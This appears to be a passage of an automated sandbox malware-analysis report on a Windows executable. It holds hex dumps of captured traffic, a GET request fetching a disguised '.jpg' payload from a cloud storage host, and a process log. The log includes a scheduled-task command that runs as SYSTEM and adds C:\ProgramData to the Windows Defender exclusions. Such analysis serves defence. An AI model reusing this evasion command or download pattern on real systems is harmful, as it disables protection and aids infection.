                                                    2025-01-06 03:44:06 UTC4096INData Raw: 96 50 05 c6 87 03 51 b1 54 f9 c1 b7 b2 40 27 d2 93 e0 a6 c0 7f 0c 42 65 64 c5 18 5e 90 25 d3 5d 5c 5b 2e e3 b7 93 6e a5 2f fc 52 51 50 77 b1 be b3 b4 b5 5f f2 47 46 45 88 43 36 cb b3 aa c5 2a 87 17 3a 39 9e 0b f2 15 be c1 46 8b df eb 16 a6 d5 13 d5 da d7 d8 d9 51 18 34 28 11 20 1f 22 88 f3 8c ad 70 a7 e8 01 49 24 13 12 65 b2 f8 74 29 86 fa 0a 83 fb 10 04 07 04 03 a4 17 33 01 01 02 88 71 09 83 f1 7d 05 59 e3 2f d2 f1 f0 49 f8 a5 12 14 15 95 2a a0 ae 5a 1b 1f 12 9b 8c 21 21 22 10 db ac 5b c3 ab d7 ca 24 ab a7 2f 2f 30 5b 36 db 99 e6 c9 c8 61 b0 47 c7 6f d5 d9 d1 bf be 1b ca 01 a5 7d 80 47 cd d4 4b 4c 4d 75 7a f0 e6 12 53 23 1c 00 04 08 b1 93 a8 a3 a2 dd 9b 6c e4 a2 17 61 ec 3b 83 83 5c 3c 83 f4 9b 91 90 29 f8 37 97 4f b2 02 50 f3 3a 86 33 47 bb 0c 7d 0b 47
                                                    Data Ascii: PQT@'Bed^%]\[.n/RQPw_GFEC6*:9FQ4( "pI$et)3q}Y/I*Z!!"[$//0[6aGo}GKLMuzS#la;\<)7OP:3G}G
                                                    2025-01-06 03:44:06 UTC4096INData Raw: 8e 79 76 23 7b 77 ad 1f fb eb cd 8e 04 6f 66 4b 6c b0 18 b6 f0 d8 99 17 d2 9c 16 59 25 a3 a1 a2 a3 27 5c a2 d5 a4 2a 4a a8 87 65 51 8b 35 c5 d4 f3 b4 4a 92 3a c8 de fa bb 2c 39 d8 ff c0 69 a4 83 c4 15 a0 87 c8 43 8c c8 ef 1c 46 88 d3 52 3c d2 15 3c d4 54 37 d8 59 22 d4 af 6c 22 13 44 1e 1c c0 70 96 80 a8 e9 67 a2 ec 67 a8 ec d3 20 7a b4 f7 7f b0 f5 39 10 f8 73 bb ff 7d 11 02 82 ed 01 87 fc 0e 75 80 f4 f9 ae f0 f2 2a 9a 60 76 52 13 84 9f 50 14 3b c8 92 5c 1f 97 58 1d a8 66 20 a9 62 24 e7 ce 2a a1 6d 2a af c3 2d ac df 32 b1 ca 3c 3a b4 61 c7 c6 c5 c6 cf 98 c2 c0 64 d4 32 24 04 45 cb 0e 48 6d 2d 0b 4c 61 29 0f 50 65 35 13 54 69 31 17 58 1d 3d 1b 5c 11 39 1f 60 35 05 23 64 02 01 27 68 e2 2e e5 70 e4 2a e0 6c fa 36 fd 6c fc 32 f8 60 f2 3e f5 68 f4 3a f0 94 0a
                                                    Data Ascii: yv#{wofKlY%'\*JeQ5J:,9iCFR<<T7Y"l"Dpgg z9s}u*`vRP;\Xf b$*m*-2<:ad2$EHm-La)Pe5Ti1X=\9`5#d'h.p*l6l2`>h:
                                                    2025-01-06 03:44:06 UTC4096INData Raw: ed e5 e7 ea e2 a8 fd e5 ab e5 e3 e7 fb f9 f0 fe fa ee f0 b6 ff fd f8 ea 96 96 9d 9e 9f a0 f3 94 93 96 92 ab ad 85 89 c4 c4 d8 8d cb c1 df c4 d5 db 94 c6 c6 d6 db dc 9a dd d3 cf 9e d3 af b6 ab ac e4 ac a8 ae bc a0 ab a7 a5 b7 af bb b9 be bc de de d5 d6 d7 d8 8b ec eb ee eb d3 d5 cd c1 8c 8c 90 c5 83 89 87 9c 8d 83 cc 9e 9e 8e 93 94 d2 95 9b 87 d6 84 8c 9d 93 94 dc 94 90 96 74 68 63 6f 6d 7f 67 73 61 66 64 06 06 0d 0e 0f 10 43 24 23 26 20 1b 1d 35 39 6a 6e 6e 78 3e 69 49 53 56 56 45 49 06 41 5d 47 49 5f 45 42 40 0f 53 50 5e 5f 39 3f 36 37 38 6b 0c 0b 0e 09 33 35 6d 61 2c 2c 30 65 23 29 27 3c 2d 23 6c 3e 3e 2e 33 34 72 35 3b 27 76 08 37 37 3f 23 35 29 71 3e 14 04 1a 0a 10 45 12 06 0a 05 0f 66 66 6d 6e 6f 70 23 44 43 45 4c 7b 7d 55 59 0f 15 1d 1f 12 1a a0 f5
                                                    Data Ascii: thcomgsafdC$#& 59jnnx>iISVVEIA]GI_EB@SP^_9?678k35ma,,0e#)'<-#l>>.34r5;'v77?#5)q>Effmnop#DCEL{}UY
                                                    2025-01-06 03:44:06 UTC4096INData Raw: 83 84 09 79 78 77 89 8a 8b 8c 73 71 70 6f 8a b2 d3 94 8a b6 d7 98 99 9a 9b 9c 63 61 60 5f a1 a2 a3 a4 71 59 58 57 a9 aa ab ac 53 51 50 4f b1 b2 b3 b4 01 94 f7 b8 47 45 44 43 bd be bf c0 02 e0 83 c4 3b 39 38 37 c9 ca cb cc 15 31 30 2f d1 d2 d3 d4 2b 29 28 27 d9 da db dc ab fa 9f e0 1f 1d 1c 1b e5 e6 e7 e8 6b ce ab ec 13 11 10 0f f1 f2 f3 f4 2d 09 08 07 f9 fa fb fc 03 01 00 ff fb 2a 43 04 fb 2e 47 08 09 0a 0b 0c f3 f1 f0 ef 11 12 13 14 c1 e9 e8 e7 19 1a 1b 1c e3 e1 e0 df 21 22 23 24 b2 0c 67 28 29 2a 2b 2c d3 d1 d0 cf 31 32 33 34 e1 c9 c8 c7 39 3a 3b 3c c3 c1 c0 bf 41 42 43 44 e3 6b 07 48 49 4a 4b 4c b3 b1 b0 af 51 52 53 54 8d a9 a8 a7 59 5a 5b 5c a3 a1 a0 9f 6a 4d 23 64 7a 49 27 68 69 6a 6b 6c 93 91 90 8f 71 72 73 74 b5 89 88 87 79 7a 7b 7c 83 81 80 7f 81
                                                    Data Ascii: yxwsqpoca`_qYXWSQPOGEDC;98710/+)('k-*C.G!"#$g()*+,12349:;<ABCDkHIJKLQRSTYZ[\jM#dzI'hijklqrstyz{|
                                                    2025-01-06 03:44:06 UTC4096INData Raw: ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee 95 96 97 98 99 9a da de de da da e6 e6 ea ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 6f 90 91
                                                    Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~o


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    10192.168.2.949984118.178.60.94437688C:\Users\user\Documents\5oqa98.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-06 03:44:07 UTC115OUTGET /FOM-51.jpg HTTP/1.1
                                                    User-Agent: GetData
                                                    Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                    Cache-Control: no-cache
                                                    2025-01-06 03:44:08 UTC548INHTTP/1.1 200 OK
                                                    Server: AliyunOSS
                                                    Date: Mon, 06 Jan 2025 03:44:08 GMT
                                                    Content-Type: image/jpeg
                                                    Content-Length: 4859125
                                                    Connection: close
                                                    x-oss-request-id: 677B51886FB42B383872C3C2
                                                    Accept-Ranges: bytes
                                                    ETag: "EE6CA3EEA7F9B1C81059AEF570A28C02"
                                                    Last-Modified: Tue, 22 Oct 2024 14:48:26 GMT
                                                    x-oss-object-type: Normal
                                                    x-oss-hash-crc64ecma: 9060732723227198118
                                                    x-oss-storage-class: Standard
                                                    x-oss-ec: 0048-00000105
                                                    Content-Disposition: attachment
                                                    x-oss-force-download: true
                                                    Content-MD5: 7myj7qf5scgQWa71cKKMAg==
                                                    x-oss-server-time: 12
                                                    2025-01-06 03:44:08 UTC3548INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                    Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                    2025-01-06 03:44:08 UTC4096INData Raw: 42 cc 3b 8b 04 80 dc 85 89 f7 db 86 4b ce 35 a8 af fe 41 fa 0c 61 84 11 0a 1b 74 3d 42 1d 8b ea 87 f2 e5 bc 47 e4 9b f0 a1 6a 44 3d f7 aa 85 fc 7c 66 99 44 42 66 08 55 a3 c2 72 d1 08 6f b1 b4 88 fb 14 6d f7 a2 e6 b1 0a 4b a7 cc 8d 43 ca 42 55 ba 2d 50 3b de 75 e4 69 e5 a6 45 fe 3f 88 51 f2 8f 9a e2 49 ea ad 5a da 33 4e a3 3e d5 c6 6e c7 d1 e8 c5 06 f1 38 15 6c 30 51 e9 b2 ec bd f6 b7 43 20 6c 37 8a c5 69 36 0c 71 9e eb 37 4c 5e 64 2d ba 15 c3 be 23 92 69 e8 07 8e 31 8e 32 59 a6 f5 54 50 cc a6 0d cb 70 1b 9f a8 37 28 8e 8c a8 b6 58 2d d6 5f 3e e5 51 37 e9 fc c0 79 61 49 dc 37 0b d7 f9 38 30 21 a3 63 4a 50 26 80 0f ad 3c d1 89 c4 d8 15 09 d3 5c 40 7c a4 b7 fe fc 2d 89 04 24 ad d9 e2 58 57 f8 d2 39 21 f1 85 1f 5d ae 5b 62 f2 2d 86 49 5e 70 f6 14 48 c1 63 66
                                                    Data Ascii: B;K5Aat=BGjD=|fDBfUromKCBU-P;uiE?QIZ3N>n8l0QC l7i6q7L^d-#i12YTPp7(X-_>Q7yaI780!cJP&<\@|-$XW9!][b-I^pHcf
                                                    2025-01-06 03:44:08 UTC4096INData Raw: 55 c7 be c5 78 ee 64 cd 2e 33 d8 00 81 41 01 fc 96 f3 c2 68 5b e3 86 3a 52 14 eb 36 47 9c d8 8b 1b 75 f9 f2 3e 9e 6a 5c af ac 2d 01 59 f6 e4 ed f8 06 96 96 25 32 d9 55 c2 2b cd d9 43 84 c0 8f da 8a 2e 4e 40 af e4 ef 68 35 b1 db 47 6c 13 6a 58 3b 70 ee a1 fc f0 ea cf 6e ad 25 29 22 ee a3 88 45 8b c6 2a 08 f5 8e fe d9 90 64 31 57 f5 7b 69 f4 88 ee 13 ee 88 13 dd fe 62 86 d5 85 88 9b aa 98 eb ae 62 7e dd 59 12 19 69 99 a8 6c 0d 6f 92 a5 a3 77 6e d0 53 bb 17 f4 5f d6 e6 1f 4a cf 6d f7 92 79 05 8e d4 33 04 97 04 b6 95 73 06 7a e5 99 05 66 48 93 78 17 26 6e e6 6b 89 ba b3 4a 9a d7 ee e1 45 2d c4 d9 46 38 58 a3 e7 df cb c0 a8 8b 48 54 ab ab c9 2b 10 28 f1 1f 7e 00 6d 13 0b 8f 10 81 c8 3f 99 d0 f4 09 6e a8 37 1d 0d 72 39 87 d5 f2 12 b6 cb fa 95 c3 25 72 27 66 14
                                                    Data Ascii: Uxd.3Ah[:R6Gu>j\-Y%2U+C.N@h5GljX;pn%)"E*d1W{ibb~YilownS_Jmy3szfHx&nkJE-F8XHT+(~m?n7r9%r'f
                                                    2025-01-06 03:44:08 UTC4096INData Raw: 45 e5 5e 68 30 58 bc f3 3c 4c f2 55 29 ac 64 46 5d 3a 9d 79 a5 77 53 ff 44 c3 e1 4a bd ab 8a bd d4 75 ea e1 2a ee 82 37 b9 6b 8b 4d 69 c9 72 b7 c8 66 c5 06 1b db fb d1 44 d1 f5 36 5b 9f 70 43 e3 b9 cc 9d 24 02 a0 15 1a ee 33 51 a6 de 11 4b 6e 87 8e 08 53 81 c7 39 1d bd 06 98 20 7a 9b 47 b4 aa c5 34 08 11 e2 e2 77 2e 0a 28 8a 33 9b 65 f3 3a 67 17 4e 17 e5 d0 55 59 0e 94 52 4b da e3 d0 7a 25 77 a6 34 0e aa 88 bd f9 1f a8 08 f8 42 83 d2 79 43 2f 04 cc aa cd fb df 7b c0 14 58 c6 51 a2 5e 37 42 12 e5 22 53 12 9f 78 be b5 39 59 c1 b2 1b 55 3b d8 b9 8f e2 36 93 6c 44 d2 80 9d 04 d2 7c 54 bb a2 23 a2 95 da 63 2d 43 a0 da 70 ab 87 c5 6b ef 95 b1 2a bd 9b 5e 30 06 ef 83 ea 01 6e 63 4c 04 68 89 7a 93 34 80 33 0b 68 86 5c 60 2f 6b 05 3f d6 5f 19 77 94 92 45 e3 e4 5c
                                                    Data Ascii: E^h0X<LU)dF]:ywSDJu*7kMirfD6[pC$3QKnS9 zG4w.(3e:gNUYRKz%w4ByC/{XQ^7B"Sx9YU;6lD|T#c-Cpk*^0ncLhz43h\`/k?_wE\
                                                    2025-01-06 03:44:08 UTC4096INData Raw: c3 8f ae 6b a3 4e 8c 8c 89 8a 8b bb 66 fa 15 1c 40 d7 45 6a 0d 3c 0a ea 62 81 9f 9c 9d 9e b3 ea 13 ac cb d0 8f f2 eb dc 40 32 33 15 5f dc 2b 1c db c0 69 be 0d f5 9a fc b0 a5 8c 0d 14 ff 63 f5 b9 a4 8d b4 ad be 22 34 78 e5 cc 65 24 7e f7 de d1 9a 58 cb 99 5d 98 d0 31 c2 08 cf dd 57 4b b4 a1 1c 1c 1b b7 d4 3e 65 a5 e6 e3 12 2f 65 7b e1 ee 0d 0c 0b fa 6d b3 dc fd 3b 87 d8 fc 7c 7e dd 05 02 03 04 6d 3f 57 b6 57 83 5f 29 0d 83 6b 34 1d fb 27 35 0f 16 ff 3b 16 00 1b 13 18 f6 b1 66 21 22 45 ad 33 ab 43 0c 2d c3 cf b7 0c 2e 49 3f 87 34 b9 62 37 5e 2b 2f 1b 64 ba fa 3f 3e 3f 40 43 80 25 cd 43 cb 23 6c 4d a3 0c bf 51 4e c4 67 da 15 57 3c e4 e7 7f b8 99 36 7f 5e 9c 51 d2 37 d9 7b 63 80 ac 75 5b 79 44 1a 33 ad 95 60 78 00 1d 23 18 b0 aa 39 1f 25 1a a3 fc d2 ed 9d d9
                                                    Data Ascii: kNf@Ej<b@23_+ic"4xe$~X]1WK>e/e{m;|~m?WW_)k4'5;f!"E3C-.I?4b7^+/d?>?@C%C#lMQNgW<6^Q7{cu[yD3`x#9%
                                                    2025-01-06 03:44:08 UTC4096INData Raw: 2c 4d a6 a0 20 85 bf 62 23 7d 82 17 a5 30 de 99 08 fd bd 71 3f 39 61 73 43 04 d3 d0 32 6b df ec 1f f3 aa 3d 7b 0a ac d4 c6 23 eb ed fa 6d 34 b5 ed 0c e2 bd 2c ed e9 83 bc 4d 87 be 3e 5f 02 ba 42 ba da 19 39 86 8b 76 98 c3 52 60 65 25 e5 a0 40 e2 e2 87 c6 57 a0 12 c5 86 50 1e d8 82 61 b1 e8 7b 70 85 f2 3b b7 dd 68 1e f0 82 30 32 37 c7 33 54 06 4a a4 ff 6e be 09 90 75 b8 64 7a 3e 21 db ce 6f 5c 64 44 b9 59 00 93 ff 91 7d e8 f9 20 94 90 60 c8 6f 44 97 f9 8e b9 3f 4e a3 4f 16 b9 47 f2 81 03 6a 69 e2 21 55 c2 e5 97 52 04 26 ef ae c8 f0 44 77 88 66 31 a0 58 9d 00 de 3e a6 b9 c8 84 84 87 db 90 d9 4b f7 1b 42 d5 22 bd 5d b8 39 1d f5 0a 38 c0 d7 f6 11 bc a9 e2 0c 57 c6 d6 d2 a9 8d 6a 24 3b 74 4e 4b d1 a2 f8 51 7c c5 b8 66 61 13 6e 3f 61 be 64 71 7e 98 bf 08 7c a7
                                                    Data Ascii: ,M b#}0q?9asC2k={#m4,M>_B9vR`e%@WPa{p;h0273TJnudz>!o\dDY} `oD?NOGji!UR&Dwf1X>KB"]98Wj$;tNKQ|fan?adq~|
                                                    2025-01-06 03:44:08 UTC4096INData Raw: 94 13 4b ba 59 94 28 79 a8 e0 04 9d d9 34 71 d1 8c 52 64 54 a0 2b 3c 9c 31 d6 31 5f dd b0 e1 72 5d e3 d3 0b c9 a4 8c fb 2c 74 4a 06 21 9f e8 77 ac 0e 7a 81 04 97 79 d9 a7 dd 40 e7 17 4f ab a4 75 32 04 32 e1 14 a8 64 5f 11 ea c6 56 50 d4 0e a9 a2 60 f3 93 c9 f3 5b a6 1a 47 9d 93 21 ea 45 f3 4d b6 6f fb a9 28 33 1d 5a 7f 16 47 e8 cf ef 81 45 43 18 41 ba 88 08 34 0b 76 70 e2 cb ca 69 b2 1e ec 31 ce 87 99 c8 ea 75 26 3c 60 26 76 99 85 6f 63 0e 0a a5 9a c7 af 0b ca ae 36 08 d2 74 3d 9c 9f c4 1f ad bf b0 84 3c 40 df 89 dd 19 5a d3 d7 79 ab d7 2e 2a a0 76 2f e6 75 8b 65 39 ad 89 15 b0 7f fa 18 c5 c7 ac b2 d7 44 6c f2 c9 cc af e9 40 b3 57 30 a5 f3 1f f5 06 cf 73 14 18 f9 0d 72 f7 19 79 98 57 e5 11 81 1a 41 9d 8f a7 7d ea 03 5c 14 65 f8 a6 73 dd d4 70 b3 48 cb 66
                                                    Data Ascii: KY(y4qRdT+<11_r],tJ!wzy@Ou22d_VP`[G!EMo(3ZGECA4vpi1u&<`&voc6t=<@Zy.*v/ue9Dl@W0sryWA}\espHf
                                                    2025-01-06 03:44:08 UTC4096INData Raw: 7e 30 df f0 37 2c a5 37 4f 4c e2 13 7c d1 f8 91 c5 fa be cf 9e 00 28 6a dd ff a3 dc ca c7 5f af 65 39 20 43 0f 76 27 75 a7 a8 f1 fa 94 9f e4 b0 f7 a8 82 87 3b 0a 53 b7 20 93 c5 42 21 59 4a 44 cf 6d 00 01 ce a2 49 10 81 c0 c4 c2 ee b6 e5 6b df 46 07 d3 21 07 58 b3 27 fb fe f2 08 3e bc 0d 03 78 9c 6a b4 0f 93 15 14 83 ae 77 c8 e3 dc db 3a e9 9b 9d 1c c6 8a 7b 52 97 8e 19 85 b7 fb c2 a6 6b fd 94 63 78 f1 63 13 10 63 6f 18 d5 92 b6 d1 b7 a2 84 9b d4 90 d9 84 fc ef a5 a6 c5 ba b6 64 c7 fe d4 d4 23 c0 71 8e e4 e7 87 ee e0 7b 41 ab 03 0e d0 58 f4 61 98 ac 8a bc 7f 9b 4c 5a 39 6c 26 9a c8 d3 6c b4 71 fa 5a e7 33 7a 60 25 a6 5a 83 a7 05 e0 89 ab f3 71 7b 1f 34 10 5a c9 8f 29 a8 53 58 fe 56 32 96 b8 9e 3a d9 ee 0c 60 09 71 b5 2b 70 55 a8 b7 e2 8b 6b 95 ad 89 2f ca
                                                    Data Ascii: ~07,7OL|(j_e9 Cv'u;S B!YJDmIkF!X'>xjw:{Rkcxccod#q{AXaLZ9l&lqZ3z`%Zq{4Z)SXV2:`q+pUk/
                                                    2025-01-06 03:44:08 UTC4096INData Raw: e7 04 8e cb 30 d6 37 73 19 58 f3 d5 05 6a d7 87 a6 a4 b9 8e a3 5d cc d5 8b 34 ca e2 6a a0 78 0e e3 7b 1c 29 5a a6 5b 55 62 f1 e6 be 23 a0 43 ad e5 d7 92 f7 b3 96 4f 03 54 71 e0 f1 af 06 a6 f0 00 d1 7e 0a b5 f4 09 e0 28 9e fb 47 84 32 32 1b 8a 9f c1 2e bc e2 8e a0 2e ff 90 dd 7e c7 83 94 f3 d0 5a 05 5e 0b 2c b3 a4 f8 4a e7 0f 49 f6 3d ff 18 c0 83 1f 5d f8 00 bd db 23 65 28 8b 33 a9 4d 2b 81 26 66 9c dc 18 b6 96 f5 c0 bf 49 34 bb da 49 5e 06 d6 0f 1c e9 ba c4 8c 4c bb 0d 49 a4 6a fd d0 ef 7e 6b 35 34 10 92 02 52 67 16 58 07 e6 47 e0 dc bb dc 14 5e a1 d9 f0 67 70 2c ed fa 8f ca 33 6f ad 4f 2b e0 78 1e f0 18 a4 c5 e4 02 81 a3 0f 9f 0e 1b 45 92 27 fc 39 cc be 57 c0 4c f8 c9 c4 77 47 d4 ac 33 24 78 3d f0 d1 e4 b8 d2 ce 88 69 21 65 3a 2c 1f 95 b1 20 31 6f 2a 06
                                                    Data Ascii: 07sXj]4jx{)Z[Ub#COTq~(G22..~Z^,JI=]#e(3M+&fI4I^LIj~k54RgXG^gp,3oO+xE'9WLwG3$x=i!e:, 1o*
                                                    2025-01-06 03:44:08 UTC4096INData Raw: be d0 2a 4c 19 64 3b ba 0e 94 4e 20 15 9f c2 86 3a 4f 85 f3 ee 58 cd 35 91 2f 10 20 88 da 3e c0 05 f8 22 66 79 44 a0 a8 56 48 12 18 4c 26 67 bf 07 bd 0e 8a 4f b7 62 4f 64 7b 46 88 30 02 d0 63 3b 3d 3c 2c 8c 51 e6 c8 ad 43 c5 a4 f1 40 de 99 5c b6 f7 dc 3c 7d 03 cf d9 bc 50 d4 5c 1b dd e0 e1 e2 85 6d a9 c3 e7 80 7d cd 51 5d 8b 19 fb d4 7c 96 d7 f0 1c 7d 23 ef f9 3d bf d8 fd 3e b9 23 40 ea b3 f0 27 06 c6 ea 0b 81 ce 0f cf e6 d6 16 19 12 9a 03 7d 2b 37 16 c5 97 7f 38 15 f7 a1 1d 02 22 4b 1f a3 92 9d c1 35 82 21 2c 90 85 a7 9e 04 28 f5 b1 d9 e8 96 b1 29 17 fc ee 8c bf c7 80 28 0e ea b1 fb 7e 34 d7 f3 21 35 2f 26 43 09 73 42 b5 c9 ae 73 45 1e 38 5f c7 ea 8b e0 a7 ba f0 52 79 4f c7 e5 a4 8b dd 4b 28 03 3d a1 25 9f ac b6 97 e3 25 09 20 15 2d d1 f6 c6 3d 63 88 5a
                                                    Data Ascii: *Ld;N :OX5/ >"fyDVHL&gObOd{F0c;=<,QC@\<}P\m}Q]|}#=>#@'}+78"K5!,()(~4!5/&CsBsE8_RyOK(=%% -=cZ


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:22:42:03
                                                    Start date:05/01/2025
                                                    Path:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\Desktop\2749837485743-7684385786.05.exe"
                                                    Imagebase:0x140000000
                                                    File size:30'885'376 bytes
                                                    MD5 hash:5B695FABFCD1DA54F7C193EF5F11EF6A
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:7
                                                    Start time:22:43:45
                                                    Start date:05/01/2025
                                                    Path:C:\Users\user\Documents\5oqa98.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\Documents\5oqa98.exe
                                                    Imagebase:0x140000000
                                                    File size:133'136 bytes
                                                    MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 0%, ReversingLabs
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:8
                                                    Start time:22:43:47
                                                    Start date:05/01/2025
                                                    Path:C:\Users\user\Documents\5oqa98.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\Documents\5oqa98.exe
                                                    Imagebase:0x140000000
                                                    File size:133'136 bytes
                                                    MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:false

                                                    General

                                                    Target ID:10
                                                    Start time:22:43:58
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                    Imagebase:0x7ff777670000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:11
                                                    Start time:22:43:58
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff70f010000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:12
                                                    Start time:22:43:58
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                                    Imagebase:0x7ff691ad0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:13
                                                    Start time:22:43:58
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:SCHTASKS /Run /TN "Task1"
                                                    Imagebase:0x7ff691ad0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:14
                                                    Start time:22:43:58
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                    Imagebase:0x7ff777670000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:15
                                                    Start time:22:43:58
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                    Imagebase:0x7ff691ad0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:16
                                                    Start time:22:43:58
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff70f010000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:17
                                                    Start time:22:43:58
                                                    Start date:05/01/2025
